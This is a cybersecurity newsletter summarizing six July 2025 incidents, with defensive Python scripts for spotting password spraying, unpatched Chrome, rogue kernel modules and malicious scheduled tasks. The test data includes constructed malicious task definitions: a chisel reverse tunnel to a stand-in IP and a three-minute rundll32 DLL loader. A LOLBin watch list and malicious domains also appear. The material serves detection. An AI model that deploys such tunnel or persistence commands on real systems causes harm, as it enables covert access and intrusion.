Cybersecurity Threats and Trends - 07/08/2025
Today's cyber roundup features critical vulnerabilities, SEO poisoning, and sophisticated APT tactics...

While you were busy debating whether your smart toaster really needs a firmware update, threat actors were busy turning enterprise networks into their personal ATMs. Welcome to this week's cybersecurity nightmare fuel – where ransomware gangs have better customer service than most legitimate businesses.
1. Ingram Micro Crippled by SafePay Ransomware Attack
Primary Threat: Global IT distributor Ingram Micro suffers major ransomware attack causing widespread service outages and supply chain disruptions.
Risk: HIGH
IT giant Ingram Micro confirmed it has been hit by a SafePay ransomware attack that began early Thursday morning, causing ongoing outages across its global operations. The attack has forced the company to shut down internal systems, including its AI-powered Xvantage distribution platform and Impulse license provisioning platform, affecting thousands of resellers and managed service providers worldwide. Sources indicate the threat actors gained initial access through Ingram Micro's GlobalProtect VPN platform, exploiting what appears to be compromised credentials or configuration weaknesses. The SafePay ransomware operation, which has accumulated over 220 victims since November 2024, has become one of the more active groups in 2025, typically targeting corporate networks through VPN gateways using password spray attacks and compromised credentials. This breach is particularly concerning given Ingram Micro's position as one of the world's largest technology distributors, creating a supply chain vulnerability that ripples through countless organizations dependent on their services for hardware, software, and cloud solutions.
Detection and Remediation Tips:
If you're an Ingram Micro customer, implement emergency procurement contingency plans and identify alternative suppliers immediately
Review all VPN access controls and implement additional authentication layers for critical infrastructure
Audit third-party vendor dependencies and develop backup supply chain strategies
Monitor for any unusual network traffic patterns that could indicate lateral movement from compromised vendor connections
Implement network segmentation to isolate vendor-facing systems from critical internal infrastructure
Consider implementing zero-trust architecture for all external vendor access points
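SafePay's reported route in, password spraying against a VPN gateway, leaves a recognizable trace: one source address failing against many different accounts with only a try or two each, which per-account lockout thresholds never catch. Below is an added detection example written for this newsletter (it is not Ingram Micro's, SafePay's or Palo Alto's code). The log layout is a constructed, hypothetical syslog-style format, so adapt the regex to your gateway's real authentication log fields; the logic of counting distinct usernames per source, then checking for a later success from the same source, carries over unchanged.

```python
"""Flag password-spray patterns in VPN gateway authentication logs.

Added example for this newsletter; it is not Ingram Micro's, SafePay's or
Palo Alto's code. The log layout below is a constructed, hypothetical
syslog-style format: adapt LINE_RE to your gateway's real auth log fields.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 203.0.113.7 fails once against six different accounts in
# 22 seconds (a spray) and then logs in as 'frank'; 198.51.100.9 is a real user
# mistyping a password twice. Only the first should be escalated.
SAMPLE_LOG = """\
2025-07-03T02:14:05Z vpn-gw auth: result=failure user=alice src=203.0.113.7
2025-07-03T02:14:09Z vpn-gw auth: result=failure user=bob src=203.0.113.7
2025-07-03T02:14:13Z vpn-gw auth: result=failure user=carol src=203.0.113.7
2025-07-03T02:14:18Z vpn-gw auth: result=failure user=dave src=203.0.113.7
2025-07-03T02:14:22Z vpn-gw auth: result=failure user=erin src=203.0.113.7
2025-07-03T02:14:27Z vpn-gw auth: result=failure user=frank src=203.0.113.7
2025-07-03T02:15:40Z vpn-gw auth: result=success user=frank src=203.0.113.7
2025-07-03T02:20:01Z vpn-gw auth: result=failure user=grace src=198.51.100.9
2025-07-03T02:20:30Z vpn-gw auth: result=failure user=grace src=198.51.100.9
2025-07-03T02:21:02Z vpn-gw auth: result=success user=grace src=198.51.100.9
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ auth: result=(?P<result>success|failure) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_events(text):
    """Return (timestamp, result, user, src) tuples; non-matching lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_password_spray(events, window=timedelta(minutes=10), min_users=5):
    """Map src IP -> finding for sources whose failures hit >= min_users distinct
    accounts within `window`. A spray is many accounts with few tries each, so
    the key is distinct usernames per source, not failures per account. Any
    success from that source after the spray began is listed separately as
    'compromised_accounts': that is the case to escalate, not just block."""
    by_src = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[0]):
        by_src[ev[3]].append(ev)
    findings = {}
    for src, evs in by_src.items():
        failures = [e for e in evs if e[1] == "failure"]
        for i, first in enumerate(failures):
            in_window = [e for e in failures[i:] if e[0] - first[0] <= window]
            users = {e[2] for e in in_window}
            if len(users) >= min_users:
                compromised = sorted({e[2] for e in evs
                                      if e[1] == "success" and e[0] >= first[0]})
                findings[src] = {"sprayed_users": sorted(users),
                                 "compromised_accounts": compromised}
                break
    return findings


if __name__ == "__main__":
    for src, finding in detect_password_spray(parse_events(SAMPLE_LOG)).items():
        print(src, finding)
```

Tune `window` and `min_users` to your user population; five distinct accounts in ten minutes from one address is conservative for a corporate gateway and will still miss a slow spray spread over days, which is why the same query should also be run over a 24-hour window with a higher threshold.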
2. Qantas Faces Extortion After Scattered Spider Data Breach
Primary Threat: Australian airline Qantas confirms extortion demands following a cyberattack that exposed data for 6 million customers.
Risk: HIGH
Qantas disclosed that threat actors are now extorting the airline following a cyberattack that potentially exposed personal information for 6 million customers, including names, email addresses, phone numbers, dates of birth, and frequent flyer numbers. The breach, detected on July 1st, occurred through a third-party contact center system and is attributed to the Scattered Spider group, which has been systematically targeting the aviation sector using sophisticated social engineering tactics. The group has demonstrated particular skill at impersonating legitimate employees to convince help desk personnel to reset passwords and re-enroll multi-factor authentication, turning the support desk itself into the bypass. This attack follows a pattern of Scattered Spider operations that began with retail sector breaches at Marks & Spencer and Co-op in April, then shifted focus to insurance companies before targeting aviation and transportation industries with successful attacks on WestJet and Hawaiian Airlines.
Detection and Remediation Tips:
Implement enhanced verification procedures for all password reset requests, especially those involving privileged accounts
Train help desk staff to recognize social engineering tactics and establish out-of-band verification protocols
Review and strengthen third-party vendor security requirements and monitoring capabilities
Consider implementing behavioral analytics to detect unusual access patterns in customer-facing systems
Develop incident response procedures specifically for social engineering attacks targeting support staff
3. Google Patches Fourth Chrome Zero-Day of 2025
Primary Threat: Google releases emergency security updates for actively exploited Chrome zero-day vulnerability CVE-2025-6554.
Risk: HIGH
Google released emergency security updates to address CVE-2025-6554, a type confusion vulnerability in Chrome's V8 JavaScript engine that is being actively exploited in the wild. This marks the fourth Chrome zero-day vulnerability patched by Google since the start of 2025, highlighting the continued targeting of web browsers by sophisticated threat actors. The vulnerability was discovered by Clément Lecigne of Google's Threat Analysis Group, suggesting it may have been weaponized in highly targeted attacks involving nation-state actors or surveillance operations. Type confusion vulnerabilities are particularly dangerous as they can be exploited to trigger unexpected software behavior, potentially leading to arbitrary code execution and complete system compromise. The flaw affects Chrome versions prior to 138.0.7204.96 and can be exploited through crafted HTML pages, making it a prime target for drive-by download attacks and watering hole campaigns.
Detection and Remediation Tips:
Update Chrome browsers immediately to versions 138.0.7204.96/.97 for Windows, 138.0.7204.92/.93 for macOS, and 138.0.7204.96 for Linux
Enable automatic browser updates across all enterprise endpoints to ensure rapid deployment of security patches
Consider implementing browser isolation technologies for high-risk users or sensitive operations
Monitor for suspicious JavaScript execution and implement content security policies to limit script execution
Extend updates to all Chromium-based browsers including Microsoft Edge, Brave, Opera, and Vivaldi
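Because the fixed builds differ by platform and Chrome's four-part version strings do not sort correctly as text, a fleet check is easy to get wrong. The following is an added example for this newsletter (not Google's tooling): it encodes the minimum patched builds listed above, compares them numerically, and treats an unknown platform or unparsable version as exposed rather than as fine. The inventory rows are constructed sample data, and the ws-03 build number is hypothetical, included only to show the string-comparison trap. Edge, Brave, Opera and Vivaldi carry their own version numbers, so check those against each vendor's advisory instead of this table.

```python
"""Check Chrome build numbers against the first patched build for CVE-2025-6554.

Added example (not Google's tooling). MIN_FIXED holds the versions the advisory
lists; SAMPLE_INVENTORY is constructed data, not real hosts.
"""
import re

MIN_FIXED = {
    "windows": "138.0.7204.96",
    "macos": "138.0.7204.92",
    "linux": "138.0.7204.96",
}

VERSION_RE = re.compile(r"^\d+\.\d+\.\d+\.\d+$")


def parse_version(text):
    """'138.0.7204.97' -> (138, 0, 7204, 97). Tuples compare numerically; raw
    strings do not ('138.0.7204.100' < '138.0.7204.96' lexically, which would
    mark a newer build as vulnerable)."""
    text = text.strip()
    if not VERSION_RE.match(text):
        raise ValueError(f"not a Chrome version string: {text!r}")
    return tuple(int(p) for p in text.split("."))


def is_patched(platform, version):
    """True when `version` is at or above the first fixed build for `platform`."""
    return parse_version(version) >= parse_version(MIN_FIXED[platform.lower()])


def triage_inventory(rows):
    """rows: (hostname, platform, version). Returns hostnames still exposed.
    Unknown platforms or unparsable versions are reported as exposed rather
    than silently passed: an inventory gap is not evidence of a patch."""
    exposed = []
    for host, platform, version in rows:
        try:
            if not is_patched(platform, version):
                exposed.append(host)
        except (KeyError, ValueError):
            exposed.append(host)
    return exposed


# Constructed inventory; ws-03's build is hypothetical and exists only to show
# why numeric comparison matters, ws-04 shows how a missing value is handled.
SAMPLE_INVENTORY = [
    ("ws-01", "windows", "138.0.7204.97"),
    ("ws-02", "windows", "138.0.7204.49"),
    ("mac-01", "macos", "138.0.7204.93"),
    ("lx-01", "linux", "137.0.7151.119"),
    ("ws-03", "windows", "138.0.7204.100"),
    ("ws-04", "windows", "unknown"),
]

if __name__ == "__main__":
    print("still exposed:", triage_inventory(SAMPLE_INVENTORY))
```

Feed `triage_inventory` from whatever your endpoint manager exports (hostname, OS, Chrome version) and the output is the remediation list; the same comparison logic is what an automatic-update compliance rule should implement.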
Did you know...?
The SafePay ransomware group behind the Ingram Micro attack has an interesting operational quirk – they often attempt to patch the same vulnerabilities they used to gain access, effectively locking out other ransomware groups from exploiting the same entry points. This "vulnerability hoarding" behavior demonstrates how competitive the ransomware-as-a-service ecosystem has become, with groups actively working to maintain exclusive access to compromised networks rather than sharing attack vectors with competitors.
4. Chinese Houken Group Exploits Ivanti CSA Zero-Days Against French Critical Infrastructure
Primary Threat: Chinese state-sponsored group Houken exploits multiple Ivanti CSA zero-day vulnerabilities targeting French critical infrastructure.
Risk: HIGH
French cybersecurity agency ANSSI revealed that Chinese hackers from the Houken group (linked to UNC5174) exploited three zero-day vulnerabilities in Ivanti Cloud Services Appliance devices to target government, telecommunications, media, finance, and transport sectors. The campaign, detected in September 2024, leveraged CVE-2024-8963, CVE-2024-9380, and CVE-2024-8190 to deploy sophisticated rootkits and maintain persistent access to compromised networks. The attackers used publicly available web shells like Behinder and neo-reGeorg, followed by deployment of GOREVERSE malware and a Linux kernel module called "sysinitd.ko" that hijacks inbound TCP traffic to enable remote command execution with root privileges. ANSSI assessed that Houken likely operates as an initial access broker, selling network access to other state-linked actors while pursuing their own financial interests through cryptocurrency mining operations.
Detection and Remediation Tips:
Immediately patch all Ivanti CSA devices and implement additional monitoring for these systems
Deploy network detection and response solutions capable of identifying kernel-level rootkits and traffic hijacking
Implement strict network segmentation around critical infrastructure components
Monitor for unusual TCP traffic patterns and unauthorized kernel module installations
Develop threat hunting procedures specifically targeting Chinese APT tactics, techniques, and procedures
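The sysinitd.ko rootkit described above is a loaded kernel module, and a loaded module that is not part of the appliance's known-good image is about as loud as a rootkit gets if anyone is looking. Here is an added example for this newsletter (not ANSSI's or Ivanti's tooling) that diffs the running module list against an approved baseline and also reads the taint flags the kernel reports in /proc/modules, where O marks an out-of-tree module and E an unsigned one. The /proc/modules listing is constructed (the sysinitd entry mimics a loaded sysinitd.ko) and BASELINE is a hypothetical allowlist you would capture from a clean image; on a live appliance pass the real file contents instead.

```python
"""Diff loaded Linux kernel modules against an approved baseline and taint flags.

Added example; not ANSSI's or Ivanti's tooling. SAMPLE_PROC_MODULES is a
constructed /proc/modules listing; on a live appliance pass
open('/proc/modules').read(). BASELINE is a hypothetical allowlist captured
from a known-good image.
"""
import os

# /proc/modules: name size refcount dependents state address [ (taint) ]
# Taint letters: O = out-of-tree, E = unsigned, P = proprietary.
SAMPLE_PROC_MODULES = """\
nf_conntrack 172032 2 nf_nat,xt_conntrack, Live 0xffffffffc0a00000
xt_conntrack 16384 1 - Live 0xffffffffc09f0000
ext4 778240 1 - Live 0xffffffffc0800000
tun 57344 0 - Live 0xffffffffc0750000
sysinitd 20480 0 - Live 0xffffffffc0b00000 (OE)
e1000 155648 0 - Live 0xffffffffc0700000
"""

BASELINE = {"nf_conntrack", "xt_conntrack", "ext4", "e1000"}

TAINT_REASONS = {"O": "out-of-tree", "E": "unsigned", "P": "proprietary"}


def parse_proc_modules(text):
    """Return {module_name: taint_letters} from /proc/modules text."""
    modules = {}
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        taint = ""
        if parts[-1].startswith("(") and parts[-1].endswith(")"):
            taint = parts[-1][1:-1]
        modules[parts[0]] = taint
    return modules


def suspicious_modules(text, baseline):
    """Return {name: [reasons]} for modules outside the baseline or carrying taint flags."""
    findings = {}
    for name, taint in parse_proc_modules(text).items():
        reasons = []
        if name not in baseline:
            reasons.append("not in baseline")
        reasons += [TAINT_REASONS[t] for t in taint if t in TAINT_REASONS]
        if reasons:
            findings[name] = reasons
    return findings


def module_file_present(name, release=None):
    """Live check only: is there a <name>.ko (optionally compressed) under the
    running kernel's /lib/modules tree? A loaded module with no file there was
    inserted from elsewhere (e.g. /tmp), which is how a dropped rootkit looks.
    Returns None when the tree is absent (non-Linux host or chroot)."""
    if release is None:
        release = os.uname().release if hasattr(os, "uname") else ""
    root = os.path.join("/lib/modules", release)
    if not os.path.isdir(root):
        return None
    wanted = {f"{name}.ko", f"{name}.ko.xz", f"{name}.ko.zst", f"{name}.ko.gz"}
    for _, _, files in os.walk(root):
        if wanted & set(files):
            return True
    return False


if __name__ == "__main__":
    for name, reasons in suspicious_modules(SAMPLE_PROC_MODULES, BASELINE).items():
        print(f"{name}: {', '.join(reasons)}")
```

The obvious caveat: a rootkit that hides itself from /proc/modules (by unlinking from the module list) defeats this check, so treat it as a cheap first pass and pair it with memory-based or network-side detection; the traffic-hijacking behavior described above is visible from outside the box even when the module is not.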
5. NightEagle APT Targets Microsoft Exchange with Zero-Day Chain
Primary Threat: Previously unknown APT group NightEagle exploits Microsoft Exchange zero-day vulnerabilities targeting Chinese military and technology sectors.
Risk: HIGH
Cybersecurity researchers from QiAnXin disclosed a new threat actor called NightEagle that has been exploiting Microsoft Exchange servers using a zero-day exploit chain to target government, defense, and technology sectors in China. The group, active since 2023, has demonstrated extremely fast infrastructure rotation and deploys a modified version of the Chisel tunneling utility configured to automatically establish connections every four hours. The attackers exploit an undisclosed zero-day vulnerability to obtain the Exchange server's ASP.NET machineKey; with that key they can craft serialized payloads the server will accept and deserialize, letting them implant trojans and remotely read mailbox data. QiAnXin attributes the activity to a North American threat actor based on attack timing patterns occurring between 9 p.m. and 6 a.m. Beijing time, which corresponds to North American business hours.
Detection and Remediation Tips:
Implement enhanced monitoring for Microsoft Exchange servers, particularly focusing on unusual authentication patterns
Deploy endpoint detection and response solutions capable of identifying modified legitimate tools like Chisel
Monitor for scheduled tasks that establish network connections at regular intervals
Implement network segmentation to limit Exchange server access to essential services only
Consider implementing Exchange Online or hybrid configurations to reduce on-premises attack surface
6. SEO Poisoning Campaign Targets SMBs with Fake AI Tools
Primary Threat: Cybercriminals use search engine optimization poisoning to distribute Oyster malware disguised as popular AI tools.
Risk: MEDIUM
Security researchers disclosed a malicious campaign leveraging SEO poisoning techniques to target over 8,500 small and medium-sized business users with malware disguised as legitimate AI tools. The campaign promotes fake websites hosting trojanized versions of popular software like PuTTY and WinSCP, tricking software professionals into downloading and installing the Oyster malware loader (also known as Broomstick or CleanUpLoader). Upon execution, the loader establishes persistence through a scheduled task that runs every three minutes and invokes rundll32.exe to load a malicious DLL through its DLL-registration export. The campaign specifically targets AI-related search terms, exploiting the current popularity of artificial intelligence tools to lure victims to malicious download sites with domains like updaterputty.com, zephyrhype.com, and putty.run.
Detection and Remediation Tips:
Implement application whitelisting and software restriction policies to prevent unauthorized executable installation
Train employees to download software only from official vendor websites and verify digital signatures
Deploy web filtering solutions to block known malicious domains and suspicious SEO-poisoned sites
Monitor for scheduled tasks that execute DLL files at regular intervals as potential indicators of compromise
Implement endpoint detection and response solutions capable of identifying Oyster/Broomstick malware families
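Both item 5 (a tunneling client that reconnects every four hours) and item 6 (rundll32 registering a DLL every three minutes) rely on Windows Scheduled Tasks with a short repetition interval, so one hunt covers both. The following is an added example for this newsletter, not something from the Oyster/Broomstick, NightEagle or QiAnXin reporting: it parses Task Scheduler XML definitions, converts the ISO 8601 repetition interval to seconds, and scores each task on independent indicators (short interval, a living-off-the-land binary as the command, rundll32 pointed at a DLL, anything running from a user-writable directory). The three task definitions are constructed, with hypothetical paths, binaries and addresses; on a real host export definitions with `schtasks /query /tn <name> /xml` (the output is UTF-16, so decode it before parsing) and pass each one to `analyze_task`.

```python
"""Triage Windows Scheduled Task definitions for short-interval LOLBin persistence.

Added example; not from the Oyster/Broomstick, NightEagle or QiAnXin reporting.
The task definitions below are constructed (hypothetical paths, binaries and
addresses). Export real ones with `schtasks /query /tn <name> /xml`.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "cmd.exe"}
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\AppData|Users\\Public|ProgramData|Temp)\\", re.I)
ISO_DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def iso_duration_seconds(text):
    """Task Scheduler repetition intervals are ISO 8601 durations: PT3M, PT4H, P1DT2H."""
    m = ISO_DURATION.match(text.strip())
    if not m:
        raise ValueError(f"not an ISO 8601 duration: {text!r}")
    days, hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def analyze_task(xml_text, max_interval=6 * 3600):
    """Return the reasons a task deserves a look: a repetition interval at or
    below max_interval, a LOLBin as the command, rundll32 pointed at a DLL, or a
    command/argument living in a user-writable directory."""
    root = ET.fromstring(xml_text)
    reasons = []
    intervals = [iso_duration_seconds(e.text or "")
                 for e in root.iterfind(".//t:Repetition/t:Interval", NS)]
    if intervals and min(intervals) <= max_interval:
        reasons.append(f"repeats every {min(intervals)}s")
    for action in root.iterfind(".//t:Actions/t:Exec", NS):
        command = (action.findtext("t:Command", default="", namespaces=NS) or "").strip()
        args = (action.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        exe = command.strip('"').rsplit("\\", 1)[-1].lower()
        if exe in LOLBINS:
            reasons.append(f"LOLBin {exe}")
        if exe == "rundll32.exe" and re.search(r"\.dll\b", args, re.I):
            reasons.append("rundll32 loading a DLL")
        if USER_WRITABLE.search(command + " " + args):
            reasons.append("user-writable path")
    return reasons


def verdict(reasons):
    """Two or more independent indicators is the threshold worth an analyst's time."""
    return "high" if len(reasons) >= 2 else "low"


# Constructed definitions. OYSTER_LIKE mirrors item 6 (three-minute rundll32 DLL
# registration); NIGHTEAGLE_LIKE mirrors item 5 (a tunneling client reconnecting
# every four hours); BENIGN is an hourly vendor agent under Program Files.
OYSTER_LIKE = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT3M</Interval></Repetition>
    <StartBoundary>2025-07-01T10:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>rundll32.exe</Command>
    <Arguments>C:\Users\Public\Libraries\loader.dll,DllRegisterServer</Arguments></Exec></Actions>
</Task>"""

NIGHTEAGLE_LIKE = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT4H</Interval></Repetition>
    <StartBoundary>2025-07-01T10:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\ProgramData\svc\chisel.exe</Command>
    <Arguments>client 203.0.113.50:443 R:socks</Arguments></Exec></Actions>
</Task>"""

BENIGN = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT1H</Interval></Repetition>
    <StartBoundary>2025-07-01T10:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\Program Files\Vendor\agent.exe</Command>
    <Arguments>--checkin</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for label, task in [("oyster-like", OYSTER_LIKE), ("nighteagle-like", NIGHTEAGLE_LIKE), ("benign", BENIGN)]:
        reasons = analyze_task(task)
        print(f"{label}: {verdict(reasons)} {reasons}")
```

A legitimate hourly agent in Program Files trips only the interval indicator and stays "low"; the two malicious patterns each trip at least two. The interval alone is deliberately not enough, since plenty of monitoring software beacons on a schedule, and the path check is what separates "installed by an admin" from "dropped by a loader".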
IN SUMMARY:
The cybersecurity landscape continues to evolve at breakneck speed, with threat actors demonstrating increasing sophistication in their targeting and attack methodologies. Organizations must adopt a proactive, multi-layered defense strategy that addresses not only technical vulnerabilities but also the human elements that remain the weakest link in most security architectures.
🚨 Key Takeaways:
✔️ Supply chain attacks against technology distributors can create widespread disruption across multiple organizations and industries.
✔️ Social engineering attacks targeting help desk personnel remain highly effective and require enhanced verification procedures
✔️ Browser zero-day vulnerabilities continue to be actively exploited, necessitating rapid patch deployment and browser isolation strategies
✔️ State-sponsored groups are increasingly operating as initial access brokers, selling network access to other threat actors
✔️ SEO poisoning campaigns are evolving to exploit current technology trends like artificial intelligence to distribute malware
🔎 Immediate Actions:
✔️ Update all Chrome browsers to the latest versions immediately
✔️ Review and strengthen VPN access controls
✔️ Implement enhanced verification procedures for password reset operations
✔️ Audit third-party vendor dependencies and develop contingency plans for disruptions
✔️ Deploy network detection and response solutions for APT tactics
✔️ Train employees to recognize SEO poisoning attacks and to verify software downloads
💡 Stay vigilant, patch promptly, and remember that in cybersecurity, paranoia isn't a disorder – it's a job requirement. 💡
J.W.
(P.S. Check out our partners! It goes a long way to support this newsletter!)